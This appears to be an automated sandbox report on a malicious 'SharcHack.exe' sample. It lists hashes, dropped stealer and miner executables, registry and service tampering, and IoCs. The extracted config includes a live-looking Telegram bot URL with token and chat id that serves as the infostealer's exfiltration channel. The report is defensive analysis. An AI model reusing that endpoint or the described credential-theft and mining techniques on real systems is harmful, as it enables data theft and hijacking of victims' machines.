Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
28-12-2024 21:19
Static task
static1
Behavioral task
behavioral1
Sample
SharcHack.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
SharcHack.exe
Resource
win10v2004-20241007-en
General
-
Target
SharcHack.exe
-
Size
39.9MB
-
MD5
796310542e9fb2886de3f8cbdf88c9fa
-
SHA1
01dc8e64ff23db2f177e3d999c12329bfcd206d3
-
SHA256
9f3b062a0f8caf16be80ac44ade55a8b8e8928ef87ae909f5d6d52aa44208193
-
SHA512
73295b9cfa07432b21d1f0d0bad360460f32d7e0170dc84406a35f4dfe2b1519fdc4028299f1075385ae4ab738be1e5bfffd7335c1038e2126669834e9a50966
-
SSDEEP
786432:Y31/CaCJz7+GWl3LNCxuEnwFho+zM77UDZiZCd08jFZJAI5E70TZFHng:URCR6GWl3LMEXFhV0KAcNjxAItjg
Malware Config
Extracted
blackguard
https://api.telegram.org/bot6540906397:AAG08fPgT-V7I17vtz49STaZEuwqXqKshuM/sendMessage?chat_id=5445185021
Signatures
-
BlackGuard
Infostealer first seen in Late 2021.
-
Blackguard family
-
Modifies security service 2 TTPs 5 IoCs
description ioc Process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 reg.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 12 IoCs
description pid Process procid_target PID 4804 created 3588 4804 3.exe 56 PID 4804 created 3588 4804 3.exe 56 PID 4804 created 3588 4804 3.exe 56 PID 4804 created 3588 4804 3.exe 56 PID 4804 created 3588 4804 3.exe 56 PID 3028 created 3588 3028 updater.exe 56 PID 3028 created 3588 3028 updater.exe 56 PID 3028 created 3588 3028 updater.exe 56 PID 3028 created 3588 3028 updater.exe 56 PID 3028 created 3588 3028 updater.exe 56 PID 4636 created 3588 4636 conhost.exe 56 PID 3028 created 3588 3028 updater.exe 56 -
Xmrig family
-
XMRig Miner payload 4 IoCs
resource yara_rule behavioral2/memory/2100-372-0x00007FF6C28F0000-0x00007FF6C30E4000-memory.dmp xmrig behavioral2/memory/2100-371-0x00007FF6C28F0000-0x00007FF6C30E4000-memory.dmp xmrig behavioral2/memory/2100-498-0x00007FF6C28F0000-0x00007FF6C30E4000-memory.dmp xmrig behavioral2/memory/2100-513-0x00007FF6C28F0000-0x00007FF6C30E4000-memory.dmp xmrig -
pid Process 4956 powershell.exe 4816 powershell.exe 1412 powershell.exe 4724 powershell.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation SharcHack.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation VegaStealer_v2.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation CheatEngine75.tmp Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation UIHost.exe -
Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
-
Executes dropped EXE 21 IoCs
pid Process 4804 3.exe 5088 VegaStealer_v2.exe 100 CheatEngine75.exe 3888 v2.exe 1300 CheatEngine75.tmp 3028 updater.exe 5040 saBSI.exe 4548 OperaSetup.exe 2252 setup.exe 1528 setup.exe 3232 setup.exe 968 setup.exe 2476 setup.exe 2708 installer.exe 4060 installer.exe 4332 ServiceHost.exe 6072 UIHost.exe 2272 updater.exe 5320 Assistant_114.0.5282.21_Setup.exe_sfx.exe 5288 assistant_installer.exe 4920 assistant_installer.exe -
Loads dropped DLL 22 IoCs
pid Process 3888 v2.exe 3888 v2.exe 3888 v2.exe 3888 v2.exe 3888 v2.exe 1300 CheatEngine75.tmp 2252 setup.exe 1528 setup.exe 3232 setup.exe 968 setup.exe 2476 setup.exe 4060 installer.exe 4332 ServiceHost.exe 4332 ServiceHost.exe 4332 ServiceHost.exe 4332 ServiceHost.exe 6072 UIHost.exe 6072 UIHost.exe 5288 assistant_installer.exe 5288 assistant_installer.exe 4920 assistant_installer.exe 4920 assistant_installer.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks for any installed AV software in registry 1 TTPs 6 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\AVAST Software\Avast CheatEngine75.tmp Key opened \REGISTRY\MACHINE\SOFTWARE\AVAST Software\Avast CheatEngine75.tmp Key opened \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\AVAST Software\Avast CheatEngine75.tmp Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\AVG\AV\Dir CheatEngine75.tmp Key opened \REGISTRY\MACHINE\SOFTWARE\AVG\AV\Dir CheatEngine75.tmp Key opened \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\AVG\AV\Dir CheatEngine75.tmp -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives 3 TTPs 4 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\D: setup.exe File opened (read-only) \??\F: setup.exe File opened (read-only) \??\D: setup.exe File opened (read-only) \??\F: setup.exe -
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 7 freegeoip.app 8 freegeoip.app 20 ip-api.com -
Power Settings 1 TTPs 10 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 1484 powercfg.exe 4532 powercfg.exe 4716 powercfg.exe 4276 powercfg.exe 1304 powercfg.exe 4836 cmd.exe 4772 cmd.exe 828 powercfg.exe 4768 powercfg.exe 2644 powercfg.exe -
Drops file in System32 directory 3 IoCs
description ioc Process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 3028 set thread context of 4636 3028 updater.exe 141 PID 3028 set thread context of 2100 3028 updater.exe 147 -
resource yara_rule behavioral2/memory/2100-355-0x00007FF6C28F0000-0x00007FF6C30E4000-memory.dmp upx behavioral2/memory/2100-372-0x00007FF6C28F0000-0x00007FF6C30E4000-memory.dmp upx behavioral2/memory/2100-371-0x00007FF6C28F0000-0x00007FF6C30E4000-memory.dmp upx behavioral2/memory/2100-498-0x00007FF6C28F0000-0x00007FF6C30E4000-memory.dmp upx behavioral2/memory/2100-513-0x00007FF6C28F0000-0x00007FF6C30E4000-memory.dmp upx -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files\McAfee\Temp3733020042\jslang\wa-res-shared-da-DK.js installer.exe File created C:\Program Files\McAfee\WebAdvisor\jslang\wa-res-overlay-ja-JP.js installer.exe File created C:\Program Files\McAfee\Webadvisor\Analytics\Scripts\preprocessors.js ServiceHost.exe File created C:\Program Files\Google\Libs\g.log cmd.exe File created C:\Program Files\McAfee\Temp3733020042\jslang\wa-res-shared-en-US.js installer.exe File created C:\Program Files\McAfee\WebAdvisor\logic\oem_business_logic.luc installer.exe File created C:\Program Files\McAfee\WebAdvisor\jslang\wa-res-pscore-toast-pt-BR.js installer.exe File created C:\Program Files\McAfee\WebAdvisor\jslang\wa-res-sstoast-bing-fr-FR.js installer.exe File created C:\Program Files\McAfee\WebAdvisor\jslang\wa-res-sstoast-it-IT.js installer.exe File created C:\Program Files\McAfee\WebAdvisor\jslang\wa-res-sstoast-pps-sv-SE.js installer.exe File created C:\Program Files\McAfee\Temp3733020042\jslang\eula-tr-TR.txt installer.exe File created C:\Program Files\McAfee\Temp3733020042\jslang\wa-res-shared-hu-HU.js installer.exe File created C:\Program Files\McAfee\WebAdvisor\MFW\packages\webadvisor\aj_toasts\wa-aj-toast-toggle.js installer.exe File created C:\Program Files\McAfee\WebAdvisor\jslang\wa-res-sstoast-adblock-fr-FR.js installer.exe File created C:\Program Files\McAfee\WebAdvisor\jslang\wa-res-upsell-toast-el-GR.js installer.exe File created C:\Program Files\McAfee\WebAdvisor\wa-uninstall.html installer.exe File created C:\Program Files\McAfee\Temp3733020042\jslang\wa-res-install-hu-HU.js installer.exe File created C:\Program Files\McAfee\WebAdvisor\jslang\wa-res-dialog-balloon-es-ES.js installer.exe File created C:\Program Files\McAfee\WebAdvisor\jslang\wa-res-dialog-balloon-fr-CA.js installer.exe File created C:\Program Files\McAfee\WebAdvisor\jslang\wa-res-dialog-balloon-pt-PT.js installer.exe File created C:\Program Files\McAfee\WebAdvisor\analyticstelemetry\events\heronerrorslog.luc installer.exe File created C:\Program Files\McAfee\WebAdvisor\MFW\packages\builtin\tooltip_img_1_3.png installer.exe File created C:\Program Files\McAfee\WebAdvisor\MFW\packages\builtin\mcafee_pc_install_icon2.png installer.exe File created C:\Program Files\McAfee\WebAdvisor\MFW\packages\webadvisor\wa-ss-toast-rebranding.js installer.exe File created C:\Program Files\McAfee\WebAdvisor\jslang\wa-res-ext-install-toast-de-DE.js installer.exe File created C:\Program Files\McAfee\WebAdvisor\jslang\wa-res-uninstall-es-MX.js installer.exe File created C:\Program Files\McAfee\WebAdvisor\MFW\packages\builtin\tooltip_img_2.png installer.exe File created C:\Program Files\McAfee\WebAdvisor\MFW\packages\builtin\wa_install_close.png installer.exe File created C:\Program Files\McAfee\WebAdvisor\MFW\packages\webadvisor\wa-overlay-ui.css installer.exe File created C:\Program Files\McAfee\WebAdvisor\jslang\wa-res-pscore-toast-sk-SK.js installer.exe File created C:\Program Files\McAfee\WebAdvisor\jslang\wa-res-sstoast-duckduckgo-fr-FR.js installer.exe File created C:\Program Files\McAfee\Webadvisor\Analytics\Scripts\engine.js ServiceHost.exe File opened for modification C:\Program Files\McAfee\Webadvisor\Analytics\transport_ga.js ServiceHost.exe File opened for modification C:\Program Files\McAfee\Webadvisor\Analytics\operations.js ServiceHost.exe File created C:\Program Files\McAfee\Temp3733020042\jslang\wa-res-install-de-DE.js installer.exe File created C:\Program Files\McAfee\Temp3733020042\jslang\wa-res-install-nl-NL.js installer.exe File created C:\Program Files\McAfee\WebAdvisor\logic\type_tag_utils.luc installer.exe File created C:\Program Files\McAfee\WebAdvisor\MFW\packages_web_view\webadvisor\edge_search\edge_search_ext_coachmark.js installer.exe File created C:\Program Files\McAfee\WebAdvisor\jslang\wa-res-upsell-toast-fi-FI.js installer.exe File created C:\Program Files\McAfee\WebAdvisor\jslang\wa-score-toast-nl-NL.js installer.exe File created C:\Program Files\McAfee\Webadvisor\Analytics\Scripts\dictionary.json ServiceHost.exe File created C:\Program Files\McAfee\Webadvisor\Analytics\Scripts\subdb.js ServiceHost.exe File created C:\Program Files\McAfee\Temp3733020042\jslang\eula-nb-NO.txt installer.exe File created C:\Program Files\McAfee\WebAdvisor\logic\oem_utils\oem_utils_wps.luc installer.exe File created C:\Program Files\McAfee\WebAdvisor\MFW\packages\webadvisor\wa-ss-toast-rebranding.html installer.exe File created C:\Program Files\McAfee\WebAdvisor\jslang\wa-res-pscore-toast-tr-TR.js installer.exe File created C:\Program Files\McAfee\WebAdvisor\jslang\wa-res-sstoast-pps-sk-SK.js installer.exe File created C:\Program Files\McAfee\WebAdvisor\MFW\packages\webadvisor\settings-icon.png installer.exe File created C:\Program Files\McAfee\WebAdvisor\MFW\packages_web_view\webadvisor\wa-ui-options.js installer.exe File created C:\Program Files\McAfee\WebAdvisor\jslang\wa-res-webboost-it-IT.js installer.exe File created C:\Program Files\McAfee\Webadvisor\Analytics\Scripts\dataset.js ServiceHost.exe File opened for modification C:\Program Files\McAfee\Webadvisor\Analytics\preprocessors.js ServiceHost.exe File created C:\Program Files\McAfee\Temp3733020042\jslang\wa-res-shared-ru-RU.js installer.exe File created C:\Program Files\McAfee\WebAdvisor\jslang\wa-res-dialog-balloon-fi-FI.js installer.exe File created C:\Program Files\McAfee\WebAdvisor\microsoftedgewebview2setup.exe installer.exe File created C:\Program Files\McAfee\Temp3733020042\balloon_safe_annotation.png installer.exe File created C:\Program Files\McAfee\WebAdvisor\jslang\wa-res-shared-cs-CZ.js installer.exe File created C:\Program Files\McAfee\WebAdvisor\jslang\wa-res-sstoast-bing-de-DE.js installer.exe File created C:\Program Files\McAfee\WebAdvisor\analyticstelemetry\events\dailypingmetriccounter.luc installer.exe File created C:\Program Files\McAfee\Temp3733020042\wa_install_check.png installer.exe File created C:\Program Files\McAfee\WebAdvisor\browserhost.exe installer.exe File created C:\Program Files\McAfee\WebAdvisor\jslang\wa-res-checklist-pt-BR.js installer.exe File created C:\Program Files\McAfee\WebAdvisor\jslang\wa-res-sstoast-adblock-fr-CA.js installer.exe File created C:\Program Files\McAfee\WebAdvisor\jslang\wa-res-sstoast-bing-pt-BR.js installer.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4708 sc.exe 2100 sc.exe 2216 sc.exe 1280 sc.exe 4592 sc.exe 2180 sc.exe 216 sc.exe 3724 sc.exe 4452 sc.exe 2408 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 15 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SharcHack.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language VegaStealer_v2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CheatEngine75.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language v2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language setup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language assistant_installer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CheatEngine75.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language saBSI.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language setup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language setup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language setup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language OperaSetup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language setup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Assistant_114.0.5282.21_Setup.exe_sfx.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language assistant_installer.exe -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ CheatEngine75.tmp Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 v2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier v2.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 CheatEngine75.tmp -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 4164 WMIC.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs ServiceHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs ServiceHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs ServiceHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs ServiceHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs ServiceHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs updater.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates ServiceHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople ServiceHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates ServiceHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust ServiceHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates updater.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates ServiceHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs ServiceHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople updater.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA ServiceHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates ServiceHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot updater.exe -
Modifies registry class 10 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{21CBFEC0-E728-420C-B4A4-A58AD2089ABA} installer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{21CBFEC0-E728-420C-B4A4-A58AD2089ABA}\InprocServer32 installer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{21CBFEC0-E728-420C-B4A4-A58AD2089ABA}\InprocServer32\ThreadingModel = "Apartment" installer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{21CBFEC0-E728-420C-B4A4-A58AD2089ABA}\ = "McAfee SiteAdvisor MISP Integration" installer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{21CBFEC0-E728-420C-B4A4-A58AD2089ABA}\InprocServer32\ = "C:\\Program Files\\McAfee\\WebAdvisor\\win32\\WSSDep.dll" installer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{21CBFEC0-E728-420C-B4A4-A58AD2089ABA}\ = "McAfee SiteAdvisor MISP Integration" installer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{21CBFEC0-E728-420C-B4A4-A58AD2089ABA}\InprocServer32\ = "C:\\Program Files\\McAfee\\WebAdvisor\\x64\\WSSDep.dll" installer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{21CBFEC0-E728-420C-B4A4-A58AD2089ABA} installer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{21CBFEC0-E728-420C-B4A4-A58AD2089ABA}\InprocServer32 installer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{21CBFEC0-E728-420C-B4A4-A58AD2089ABA}\InprocServer32\ThreadingModel = "Apartment" installer.exe -
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8\Blob = 5c0000000100000004000000001000001900000001000000100000005d1b8ff2c30f63f5b536edd400f7f9b40300000001000000140000004efc31460c619ecae59c1bce2c008036d94c84b809000000010000000c000000300a06082b060105050703031d00000001000000100000005467b0adde8d858e30ee517b1a19ecd91400000001000000140000001f00bf46800afc7839b7a5b443d95650bbce963b53000000010000001f000000301d301b060567810c010330123010060a2b0601040182373c0101030200c06200000001000000200000007b9d553e1c92cb6e8803e137f4f287d4363757f5d44b37d52f9fca22fb97df860b000000010000004200000047006c006f00620061006c005300690067006e00200043006f006400650020005300690067006e0069006e006700200052006f006f007400200052003400350000000f0000000100000030000000c130bba37b8b350e89fd5ed76b4f78777feee220d3b9e729042bef6af46e8e4c1b252e32b3080c681bc9a8a1afdd0a3c040000000100000010000000e94fb54871208c00df70f708ac47085b200000000100000076050000308205723082035aa00302010202107653feac75464893f5e5d74a483a4ef8300d06092a864886f70d01010c05003053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f7420523435301e170d3230303331383030303030305a170d3435303331383030303030305a3053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f742052343530820222300d06092a864886f70d01010105000382020f003082020a0282020100b62dc530dd7ae8ab903d0372b03a4b991661b2e5ffa5671d371ce57eec9383aa84f5a3439b98458ab863575d9b00880425e9f868924b82d84bc94a03f3a87f6a8f8a6127bda144d0fdf53f22c2a34f918db305b22882915dfb5988050b9706c298f82ca73324ee503a41ccf0a0b07b1d4dd2a8583896e9dff91b91bb8b102cd2c7431da20974a180af7be6330a0c596b8ebcf4ab5a977b7fae55fb84f080fe844cd7e2babdc475a16fbd61107444b29807e274abff68dc6c263ee91fe5e00487ad30d30c8d037c55b816705c24782025eb676788abba4e34986b7011de38cad4bea1c09ce1df1e0201d83be1674384b6cffc74b72f84a3bfba09373d676cb1455c1961ab4183f5ac1deb770d464773cebfbd9595ed9d2b8810fefa58e8a757e1b3cfa85ae907259b12c49e80723d93dc8c94df3b44e62680fcd2c303f08c0cd245d62ee78f989ee604ee426e677e42167162e704f960c664a1b69c81214e2bc66d689486c699747367317a91f2d48c796e7ca6bb7e466f4dc585122bcf9a224408a88537ce07615706171224c0c43173a1983557477e103a45d92da4519098a9a00737c4651aaa1c6b1677f7a797ec3f1930996f31fbea40b2e7d2c4fac9d0f050767459fa8d6d1732bef8e97e03f4e787759ad44a912c850313022b4280f2896a36cfc84ca0ce9ef8cb8dad16a7d3ded59b18a7c6923af18263f12e0e2464df0203010001a3423040300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e041604141f00bf46800afc7839b7a5b443d95650bbce963b300d06092a864886f70d01010c050003820201005e2bba749734445f764828408493ee016ee9a1b3d68025e67be4bc09913d0ffc76add7d43020bb8f60d091d61cf29cef781a2b943202c12496525202d0f3d1fcf29b396e99e11f8e43417d9a1e5bc95d9a84fc26e687f3747226ada41bd93d3b6a52a03c091e2f1e7bb333b445c7f7acb1af9360ad76aeb8b21578eb836aebffdb46ab24e5ee02fa901f59c02f5dd6b75da45c10b77253f8414eccfa781a254acafe85624361c3b437aa81d2f4d63a0fbd8d597e3047de2b6be72150335fd4679bd4b8679f3c279903ff85438e7312ca20cde861d5b166dc17d6396d0fdbcf2337a182894e1c6b3fd6a0cdaa079d3e4226aad70ceefa47bf1a527ed17581d3c98a62176d4f88a021a0263eaf6dd962301fe99828ae6e8dd58e4c726693808d2ae355c760679042565c22510fb3dc4e39ee4dddd91d7810543b6ed0976f03b51eb22373c612b29a64d0fc958524a8ffdfa1b0dc9140aedf0933abb9dd92b7f1c